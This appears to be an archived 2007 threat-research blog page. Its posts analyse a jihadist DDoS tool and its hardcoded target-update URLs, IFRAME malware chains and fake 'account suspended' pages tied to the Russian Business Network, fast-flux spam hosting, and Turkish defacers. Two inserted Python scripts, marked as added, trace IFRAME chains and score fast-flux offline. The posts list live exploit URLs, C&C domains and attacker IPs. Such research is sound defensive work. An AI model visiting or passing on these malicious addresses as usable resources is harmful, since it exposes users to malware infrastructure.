It's intergalactic security statements like these that provoked me to do my most insightful research into the topic of what cyber jihad is, or what cyber jihad isn't. The news item on cyber jihadists coordinating a massive DDoS attack is a cyclical one, namely it reappears every quarter, as it did in August, and so I reviewed the tool, provided screenshots, and commented that while it's an aspirational initiative, with thankfully lame execution, it's not a coordinated DDoS attack executed in such a way that should be feared, but cyber jihadists outsourcing the process. Even though absolutely nothing has changed in respect to the way the program operates since v2.0, except that al-jinan.org changed to the now down al-jinan.net, the web is buzzing about the plans of wannabe cyber jihadists, the Al Ansar Hacking Team to be precise, to DDoS infidel sites on the 11th of November. Boo! Spooky: Al Qaeda cyber-jihad to begin Nov. 11; The e-Jihadists are coming, the e-Jihadists are coming!; Report: Al Qaeda to Launch Cyber-Attack on Nov. 11; Al-Qaeda Planning Cyber Attack?.

Key points :

- despite the fact that the DoS tool recommended in the previous post is detected by almost all anti virus vendors, in a people's information warfare situation the participants will purposely turn off their AVs to be able to use it

- the Electronic Jihad program is an example of a poorly coded one, poorly in the sense that it obtains the list of sites to be attacked from a single location, so you have a situation with 1000 wannabe cyber jihadists unable to attack anyone in a coordinated manner once the host gets shut down

- the central update locations at the al-jinan.net domain are down, thank you Warintel, and so are the several others included, so you have a situation where forums and people start recommending the tool, which they obtained before the site was shut down, but can't get the list of targets to be attacked

Time to assess the binary. The program archive's fingerprints as originally distributed :

File size: 358490 bytes
MD5: f38736dd16a5ef039dda940941bb2c0d
SHA1: 769157c6d3fe01aeade73a2de71e54e792047455

No AV detects this one.

E-Jihad.exe as the main binary
File size: 94208 bytes
MD5: caf858af42c3ec55be0e1cca7c86dde3
SHA1: f61fde991bfcc6096fa1278315cad95b1028cb4b

ClamAV - Flooder.VB-15
Panda - Suspicious file
Symantec - Hacktool.DoS

In a people's information warfare incident where the ones contributing bandwidth would purposely shut down their AVs, does it really matter whether or not a perimeter defense solution detects it? It does from the perspective of wannabe cyber jihadists wanting to use their company's bandwidth for the purpose, an environment in which they are hopefully not able to shut down the AV, thus forwarding the responsibility for participating in the attack to their companies.

Al-jinan.org has been down since the Electronic Jihad Against Infidel Sites campaign became evident, so the question is - where's the current DDoS campaign site? A mirror of the first campaign is available here - al-ansar.virtue.nu. A cached copy of al-jinan.net (202.71.104.200) is still available. Emails related to the Al Ansar Hacking Group - the_crusaders_hell @ yahoo.com; the_crusaders_hell @ hotmail.com; al-ansar @ gooh.net. Now the interesting part - where are Al-Jinan's new target synchronization URLs, and did they actually diversify them given that Al-Jinan.net is now down, courtesy of what looks like Warintel's efforts? Partly. Here are the update URLs found within the binary :

al-jinan.net/ntarg.php?notdoing=yes
al-jinan.net/ntarg.php?howme=re
al-jinan.net/tlog.php?
al-jinan.net/tnewu.php?
arddra.host.sk/ntarg.php
jofpmuytrvcf.com/ntarg.php
jo-uf.net/ntarg.php

All are down, and jo-uf.net was among the domains used in the first version of the attack. If you think about it, even a wannabe botnet master will at least ensure the botnet's update locations are properly hardcoded within the malware. More details on jo-uf.net.

Let's discuss what cyber jihad isn't. Cyber jihad is anything but shutting down the critical infrastructure of the country in question, despite the potential for a blockbuster movie scenario here. It's news stories like these, emphasizing the abuse of the Internet medium for achieving their objectives in the form of recruitment, research, fund raising, propaganda and training, rather than wanting to shut it down. Logically, this is where all the investments go, because this is the most visible engagement point between a government and potential cyber terrorists - its critical infrastructure. I'm not saying don't invest in securing it, I'm just emphasizing that you should balance such spending with the pragmatic reality, which can be well described by using an analogy from the malware world: what used to be destructive viruses are now the types of malware interested in abusing your data, not destroying it.

The real threat does not come from wannabe cyber jihadists flooding a particular site in a coordinated manner, but from outsourcing the entire process to those who specialize in the service, or provide the infrastructure for it on demand. That's of course given they actually manage to keep the update locations up for longer than 24 hours, and achieve the mass effect of wannabe cyber jihadists using it all at once, the type of Dark Web Cyber Jihad trade-off.

I See Alive IFRAMEs Everywhere

November 06, 2007
During the weekend, the entire Newsland.ru, which is among the most popular Russian news portals, was marked as "this site may harm your computer" by StopBadware.org due to an embedded IFRAME link pointing to where else if not the RBN. Considering that each and every embedded malware attack during 2007 that I assessed in previous posts had something to do with the RBN in the form of a single RBN IP used in numerous malicious activities all at once (different sites get embedded with it, blackhat SEO postings at different forums etc.), in this one the parties behind the attack dedicated a special IP with what looks like a clean IP reputation. A cached copy of the page will still load the live exploit url at 81.95.150.115/cgi-bin/in.cgi?p=user1. What really happened at Newsland.ru? Was it an end user who submitted a news story with the IFRAME somehow embedded, to conduct a sort of unethical competitive engagement by having Google mark the entire portal as harmful, or was it planned and executed on purpose?

In another such incident, Podfeed.net was recently hacked and malware embedded on its front page. The now clean site, however, used to have an embedded link, over 20 times to be precise, pointing to the following URL :

yl18.net/0.js (125.65.77.25), with the .js having two IFRAMEs within, namely yl18.net/0.html - 404 dead, and the second IFRAME yl18.net/z.html, which loads a third IFRAME within, pointing to yzgames.cn/game.htm (125.46.105.140). This IFRAME-ing game relies entirely on yl18.net/0.js to keep up and running, and a direct loading link to the script was also somehow embedded on high trafficked sites such as cincinnatiusa.com; cincinnati.com; guidance.nice.org.uk. Moreover, Maarten Van Horenbeeck at the ISC's blog has some detection rates from while the malware was still active. This embedded malware campaign is a perfect example of an ongoing cover up, just like the case when, several hours after the community started looking at the Bank of India's malware serving site, the RBN URL removed the javascript and redirected it to Google.com, and we had the same situation with the recent discovery of 100 malwares on a single RBN IP, where the directory name changed several hours later for yet another time. The same is the situation with the malicious parties behind Possibility Media's malware attack, who once they started getting visited by security vendors replaced their main index page with a "get lost" message, as well as with RBN's fake "account suspended" messages, which aren't really a cover up, but a deception stage like always.
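As an added illustration of the IFRAME chain described above (not code from the post): the walker follows iframe and script src references through a constructed, offline stand-in for the web, records dead hops such as the 404 on 0.html instead of aborting, and lists the third-party hosts the chain pulls in. The page bodies and the podfeed.example start URL are constructed; only the host names mirror the post.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for fetching pages: URL -> body it served. The shape of
# the chain (0.js -> 0.html and z.html -> game.htm) follows the post; the bodies
# themselves are invented for this example.
SAMPLE_WEB = {
    "http://podfeed.example/":
        '<html><body>Podcasts<script src="http://yl18.net/0.js"></script></body></html>',
    "http://yl18.net/0.js":
        'document.write(\'<iframe src="http://yl18.net/0.html" width=0 height=0></iframe>\');'
        'document.write(\'<iframe src="z.html" width=0 height=0></iframe>\');',
    "http://yl18.net/z.html":
        '<iframe src="http://yzgames.cn/game.htm"></iframe>',
    "http://yzgames.cn/game.htm":
        "<html>final stage (constructed placeholder, no payload)</html>",
    # yl18.net/0.html is deliberately absent: the post reports it as a 404.
}

# Matches the src of <iframe> and <script> tags, including tags written out
# from inside JavaScript strings (document.write), which plain HTML parsers miss.
SRC_RE = re.compile(r'<(iframe|script)[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def extract_refs(base_url, body):
    """Absolute URLs of every iframe/script src found in the body."""
    return [urljoin(base_url, m.group(2)) for m in SRC_RE.finditer(body)]

def follow_chain(start, fetch, max_depth=6):
    """Breadth-first walk of the load chain starting at `start`.

    `fetch(url)` returns the body or None for a dead URL. Returns the list of
    (loader, loaded) edges, the dead URLs, and the sorted third-party hosts.
    """
    start_host = urlsplit(start).hostname
    edges, dead, foreign = [], [], set()
    queue, seen = [(start, 0)], {start}
    while queue:
        url, depth = queue.pop(0)
        body = fetch(url)
        if body is None:                 # dead hop: record it and keep walking
            dead.append(url)
            continue
        if depth >= max_depth:           # guard against self-referencing loops
            continue
        for ref in extract_refs(url, body):
            edges.append((url, ref))
            if urlsplit(ref).hostname != start_host:
                foreign.add(urlsplit(ref).hostname)
            if ref not in seen:
                seen.add(ref)
                queue.append((ref, depth + 1))
    return edges, dead, sorted(foreign)

if __name__ == "__main__":
    for loader, loaded in follow_chain("http://podfeed.example/", SAMPLE_WEB.get)[0]:
        print(loader, "->", loaded)
```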

While I was researching a third domain that was serving a banking trojan, and loading IFRAMEs to sicil.info, which in case you don't remember is the IFRAME behind the Syrian Embassy hack, I came across injected blackhat SEO campaigns at two universities advertised in between the IFRAMEs, now removed, cached copies available - emissary.wm.edu/EE/cache; hsutx.edu/student_life/brand/wp-content/uploads. The reason I won't mention the domain in question is that the script kiddies behind it forgot to take care of their directory permissions, just like the Russian Business Network did recently, and while in RBN's case over 100 malwares were spotted, in this case it's a web C&C for a metaphisher type of banking malware kit, namely Zeus. It gets even more interesting, as it appears that a Turkish defacer like the ones I blogged about yesterday is somehow connected with the group behind the recent Possibility Media's attack and the Syrian Embassy hack, as some of his IFRAMEs are using the exact URLs from the previous attacks. And as you already know from reading my previous assessments and the connections between them, one of the attack IPs in the Possibility Media's malware attack was also among the ones used in the Bank of India hack - it's the "ai siktir vee?" group with another unique IP.

Key points :

- a Turkish defacer is taking advantage of a remotely installed web backdoor in order to host a metaphisher type of banking malware kit
- the defacer is embedding iframes that were used in the Bank of India hack, the Syrian Embassy hack, and the recent Possibility Media's malware attack
- if defacers start cooperating with malware groups given each of them excels at different practices, it's gonna get very ugly

If you don't take care of your site's web vulnerability management, someone else will.

Overperforming Turkish Hacktivists

November 05, 2007
Last month's Turkish/Swedish hacktivism tensions surprised me, mainly because the Swedes responded to the defacements in an entirely different way :

"On Saturday a group of disgruntled hackers posted a comment to the Flashback online forum linking to a stolen database containing thousands of user names and passwords from Turkish forum Ayyldz, the site thelocal.se reported on Tuesday. The Swedes also broke into the e-mail and MSN accounts of Turkish Web users and sent messages using the stolen identities. Among the images in circulation was a pornographic illustration of the Prophet Mohammed and Mustafa Kemal Ataturk, the founder of the modern Turkish state."

How do you keep track of defaced sites "courtesy" of Turkish script kiddies? Zone-h for sure, while in fact there are so many defacements done by Turkish hacking groups that the hacktivists have localized the defacement archives into Turkish for better transparency, and by doing so make Turkish defacements during hacktivism wars much easier to keep track of. Who are the most active Turkish defacers anyway?

Top 5 Turkish Defacers at the first defacement mirror :

U-H-T - 8517
1923turk - 6711
hackpowerteam.org - 5364
By_CECEN - 5230
nadir_piero - 4440

Top 5 Turkish Defacers at the second defacement mirror :

Lonely.Antalya - 1101
Pit10 - 1000
beyrut-KaI3uS - 863
HEXB00T3R - 747
myturkx.org - 675

Lots of data to cross-check for sure. Best of all - it's a real time example of the people's information warfare concept, virtual PSYOPS to be precise. Defacing sites using automated vulnerability scanning and exploitation tools is one thing, embedding malware on the defaced sites is totally another, and while we've been witnessing the emergence of embedded malware during 2007, it's questionable whether it's done only for the aggregation of infected hosts into botnets, or for a specific hacktivist cause for instance.

Rebranding a Security Vendor

November 05, 2007
Rebranding by itself is a tricky process, which if not coordinated at all levels of the enterprise could result in severe channel conflicts damaging the brand's image, and increasing the risk of confused positioning.

PandaSoftware's recent rebranding to PandaSecurity comes as a smoothly executed example of the process, as it needed to take advantage of the entire marketing toolset in order to communicate their new vision, mostly a sound repositioning strategy emphasizing that the company's core competency is not software in general, but IT security. As in every other marketing campaign aiming to achieve such an effect, the business lingo used affects the prospective audience of the campaign, be it the U.S. or the EMEA markets, or even better in respect to globalization - try to influence both with a clear vision, namely that "Prevention is better than the cure". The question from a marketing perspective always remains - is it a brand with a mission, or is it a mission with a brand, and isn't the second a better socially oriented positioning than the standard practice?

Meanwhile, here's another proof that building a solid brand results in sustained brand equity, thereby attracting potential acquirers' interest which is the case with McAfee's recent acquisition of ScanAlert for $51M. What they're buying is not the technology behind the company, a daily managed penetration testing process, but ScanAlert's brand and clients list.


Managed Fast-Flux Provider

November 03, 2007
Vertical integration in the spamming market means you don't just provide potential customers lists in the form of harvested emails, and the infrastructure for the mass mailing consisting of hundreds of infected PCs, but also occupy emerging market segments such as the need to increase the overall time a spam/phishing campaign remains online, as well as to make it hard to trace back, courtesy of fast-flux networks. And so, the IP that was hosting the spam/phishing campaign in the last 5 minutes is now clean and has nothing to do with it.

There's an interesting tactic phishers and spammers are starting to use, next to the pure fast-flux at the DNS level I covered in a previous post, and that is dynamically serving the data from multiple locations per web session. Take meds247.org for instance. Who's providing meds247.org's fast-flux infrastructure? In the first example we had "a dynamic subdomain generating spamming host running a proxy server every time the central campaign URL gets refreshed via an obfuscated javascript". The javascript is now gone, but the content (dynamic per page view) is obtained from dynamic locations behind a proxy. For instance, while the domain resolves to 78.94.45.76, the content in the session is obtained from 72.2.16.236:8088/vti_sys. And even though the DNS records and the content IPs change, the vti_sys directory structure doesn't, a fast-fluxing service that I feel Send-Safe.com branded as "Your Own Proxies" and, as it looks, uses for their own order processing, next to maintaining a rogue certificate authority for anyone who dares to shop there :

216.153.170.110:8088/vti_sys/order.php?product=ssnp
216.153.170.110:8088/vti_sys/order.php?product=sspc
216.153.170.110:8088/vti_sys/order.php?product=sse1
216.153.170.110:8088/vti_sys/order.php?product=ssalonesite
67.118.79.234:8088/vti_sys/order.php?product=sslm

More info about Send-Safe.com, a spamware vendor that's vertically integrating in the spamming market.
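As an added example, not from the post and not Send-Safe's tooling: the script scores a constructed resolver/proxy log for the two traits described in this post, DNS answers that rotate between addresses with short TTLs, and session content fetched from a host other than the one DNS returned. The thresholds, the static.example control domain, and every log value other than meds247.org, 78.94.45.76 and 72.2.16.236 are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address

# Constructed log: (minute, domain, A record, TTL seconds, IP the session's
# content was actually fetched from). Only meds247.org, 78.94.45.76 and
# 72.2.16.236 come from the post; everything else is invented.
OBSERVATIONS = [
    (0,  "meds247.org", "78.94.45.76",   180, "72.2.16.236"),
    (3,  "meds247.org", "203.0.113.17",  180, "72.2.16.236"),
    (6,  "meds247.org", "198.51.100.42", 180, "198.51.100.7"),
    (9,  "meds247.org", "192.0.2.200",   180, "72.2.16.236"),
    (12, "meds247.org", "203.0.113.99",  180, "203.0.113.99"),
    (0,  "static.example", "192.0.2.10", 86400, "192.0.2.10"),
    (3,  "static.example", "192.0.2.10", 86400, "192.0.2.10"),
    (12, "static.example", "192.0.2.10", 86400, "192.0.2.10"),
]

def flux_features(observations):
    """Per domain: distinct A records, distinct /16 networks, lowest TTL seen,
    and how many sessions pulled content from a host other than the DNS answer."""
    feats = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None,
                                 "sessions": 0, "proxied": 0})
    for _, domain, ip, ttl, content_ip in observations:
        f = feats[domain]
        f["ips"].add(str(ip_address(ip)))      # also validates the address
        f["nets"].add(ip.rsplit(".", 2)[0])    # /16 prefix as a cheap stand-in for ASN
        f["min_ttl"] = ttl if f["min_ttl"] is None else min(f["min_ttl"], ttl)
        f["sessions"] += 1
        f["proxied"] += content_ip != ip
    return feats

# Assumed thresholds (not from the post): a TTL of a few minutes, several
# addresses spread over more than one network, and content served from
# elsewhere than the resolved host in at least half of the sessions.
def is_fast_flux(f, max_ttl=300, min_ips=3, min_nets=2):
    return f["min_ttl"] <= max_ttl and len(f["ips"]) >= min_ips and len(f["nets"]) >= min_nets

def is_proxied(f, ratio=0.5):
    return f["sessions"] > 0 and f["proxied"] / f["sessions"] >= ratio

def classify(observations):
    """Map each domain to (dns_flux, content_proxied)."""
    return {d: (is_fast_flux(f), is_proxied(f)) for d, f in flux_features(observations).items()}

if __name__ == "__main__":
    for domain, (flux, proxied) in classify(OBSERVATIONS).items():
        print("%s dns-flux=%s content-proxied=%s" % (domain, flux, proxied))
```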

Detecting and Blocking the Russian Business Network

November 03, 2007
Bleeding Edge Threats recently announced the release of some very handy RBN blocking/detecting rulesets :

"Call these hosts what you like, we see a large amount of hostile activity from these nets, and get little to no abuse response for takedown. Do what you will with this information."

Remember RBN's fake anti virus and anti spyware software? The list is getting bigger with another 20 additions, again hosted on RBN IPs, exposed by the RBNExploit blog.

Meanwhile, you may also be interested in how an abuse request gets handled at the RBN. Deceptively, of course. Each and every domain or IP that has somehow been reported as malicious to them, not once but numerous times by different organizations, starts serving a fake account suspended message, like the following malicious domains hosted at the RBN do :

"This Account Has Been Suspended For Violation Of Hosting Terms And Conditions. Please contact the billing/support department as soon as possible"

- superengine.cn (81.95.149.181) - fake account suspended message, no malicious script at front page but within the domain

- eliteproject.cn (81.95.149.124) - fake account suspended message, no malicious script at front page but within the domain

- space-sms.info (200.115.174.248) - fake account suspended, loads the malicious takenames.cn

- lem0n.info (200.115.174.248) - fake account suspended message, obfuscated javascript to bl0cker.info

- worldtraff.cn (200.115.174.248) - fake account suspended message, loads bl0cker.info and takenames.cn

- takenames.cn (58.65.239.66) - fake of eValid web testing solution, interacting with all of these domains

Dots, dots, dots, 58.65.239.66 or takenames.cn for the time being, used to resolve to goodtraff.biz in the past, another RBN operation we know from the Bank of India hack, where the second RBN IP was used in the most recent Possibility Media's Malware Fiasco as well.